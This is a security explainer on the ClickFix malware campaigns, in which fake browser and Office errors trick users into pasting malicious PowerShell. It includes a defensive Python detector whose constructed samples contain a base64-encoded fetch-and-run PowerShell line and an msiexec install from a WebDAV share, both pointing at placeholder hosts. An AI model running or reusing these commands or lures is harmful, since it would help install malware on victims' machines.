
ClickFix Malware

A recent malware distribution strategy uses deceptive notifications that imitate Google Chrome, Microsoft Word and OneDrive errors. These fake alerts aim to trick users into executing malicious PowerShell 'fixes' that ultimately install malware. The technique has been observed in use by various threat actors, including those associated with ClearFake, a new group tracked as ClickFix, and the notorious TA571. TA571 is known as a spam distributor responsible for sending large volumes of emails that often lead to malware and ransomware infections.

Previously, ClearFake attacks involved website overlays that tricked visitors into installing malware by posing as fake browser updates.

Fake Error Alerts May Deliver Malware Threats

In the reported attacks, threat actors have expanded their methods to include JavaScript embedded in HTML attachments and on compromised websites. These tactics now involve overlays that simulate fake errors from Google Chrome, Microsoft Word and OneDrive. The deceptive alerts urge visitors to click a button that copies a PowerShell 'fix' to their clipboard, then instruct them to paste and execute it in either a Run dialog or a PowerShell prompt.

Although this attack chain relies on significant user interaction, its social engineering is polished enough to present users with what appears to be a genuine problem and its solution at the same time. This can prompt users to act hastily without fully assessing the associated risks. Infosec researchers have identified several payloads used in these attacks, including DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and the Lumma Stealer.

Fraudulent Scripts Drop Malware to Users’ Devices

Analysts have identified three distinct attack chains, distinguished primarily by their initial stages; only the first is not definitively linked to TA571.

In the first scenario, associated with threat actors connected to ClearFake, users visit compromised websites that load malicious scripts hosted on the blockchain via Binance's Smart Chain contracts. These scripts perform checks and then trigger fake Google Chrome alerts claiming a problem displaying the web page. The dialog prompts visitors to install a 'root certificate' by copying a PowerShell script to the Windows Clipboard and executing it in a Windows PowerShell (Admin) console.

Upon execution, the PowerShell script validates the target device. It proceeds to perform actions such as flushing the DNS cache, clearing clipboard contents, displaying a distraction message and downloading a remote PowerShell script. This script, in turn, conducts anti-VM checks before initiating the download of an information-stealing payload.

ClickFix and Lure Emails Used as Alternative Attack Chains

The second attack chain is linked to the 'ClickFix' campaign, utilizing website injections on compromised sites to create an iframe overlay presenting a fake Google Chrome error. Users are directed to open 'Windows PowerShell (Admin)' and paste provided code, resulting in the same infections mentioned previously.

Another infection method involves email-based attacks using HTML attachments resembling Microsoft Word documents. Users are prompted to install the 'Word Online' extension to view the document correctly. The error message provides 'How to fix' and 'Auto-fix' options. Selecting 'How to fix' copies a base64-encoded PowerShell command to the clipboard, instructing users to paste it into PowerShell. 'Auto-fix' employs the search-ms protocol to display a WebDAV-hosted 'fix.msi' or 'fix.vbs' file from a remote attacker-controlled file share. In these instances, the PowerShell commands download and execute either an MSI file or a VBS script, leading to infections by Matanbuchus or DarkGate, respectively.

Throughout these attacks, threat actors exploit users' lack of awareness regarding the risks associated with executing PowerShell commands on their systems. They also capitalize on Windows' inability to detect and prevent the harmful actions triggered by the pasted code.
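Because the pasted commands themselves are not blocked, detection has to key on what they do. The following is an added example, not code from the original page: it scores constructed process command lines (of the kind PowerShell script block logging or Sysmon process-creation events would record) against the behaviours described above, namely base64-encoded PowerShell, DNS cache flushing, clipboard clearing, remote script download, and search-ms/WebDAV-hosted fix.msi or fix.vbs. The regexes, the alert threshold and the sample lines are assumptions of this example.

```python
import base64
import re

# Illustrative indicator patterns (an assumption of this example, not a vendor
# rule set) for the behaviours the page attributes to the ClickFix chains.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
INDICATORS = {
    "encoded_command": ENCODED_RE,
    "flush_dns": re.compile(r"Clear-DnsClientCache|ipconfig\s+/flushdns", re.I),
    "clear_clipboard": re.compile(r"Set-Clipboard|Clipboard\]::Clear", re.I),
    "remote_download": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|Invoke-Expression|\biex\b", re.I),
    "search_ms": re.compile(r"search-ms:", re.I),
    "webdav_fix": re.compile(r"DavWWWRoot|fix\.(?:msi|vbs)\b", re.I),
}
HIGH = {"search_ms", "webdav_fix"}  # lure-specific artefacts that alone warrant an alert


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext of a -EncodedCommand payload, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_cmdline(cmdline):
    """Match the command line plus its decoded payload (if any) against the
    indicators; returns the sorted names of those that hit."""
    haystack = cmdline + "\n" + (decode_encoded_command(cmdline) or "")
    return sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))


def is_suspicious(cmdline):
    """One generic indicator (an admin flushing DNS) is routine; two together,
    or any lure-specific one, match the chain described above."""
    hits = analyze_cmdline(cmdline)
    return len(hits) >= 2 or bool(HIGH.intersection(hits))


# Constructed sample command lines (not real telemetry). The encoded one wraps
# the actions the page attributes to the first-stage script; the URL is a placeholder.
STAGE1 = "Clear-DnsClientCache; Set-Clipboard -Value ''; iex (iwr http://example.invalid/fix.ps1)"
SAMPLES = [
    'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',
    'powershell.exe -Command "Clear-DnsClientCache"',
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode(STAGE1.encode("utf-16-le")).decode(),
    r"msiexec.exe /i \\example.invalid@80\DavWWWRoot\fix.msi /quiet",
]
```

Running `is_suspicious` over `SAMPLES` flags only the encoded first-stage script and the WebDAV-hosted fix.msi; the benign service query and the lone DNS flush are left alone.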

The varied attack chains observed by researchers indicate that TA571 is actively exploring diverse methods to enhance efficacy and discover additional pathways for infecting a greater number of systems. This adaptive approach underscores the cybercriminals' commitment to evolving their tactics and expanding their impact within the cybersecurity landscape.
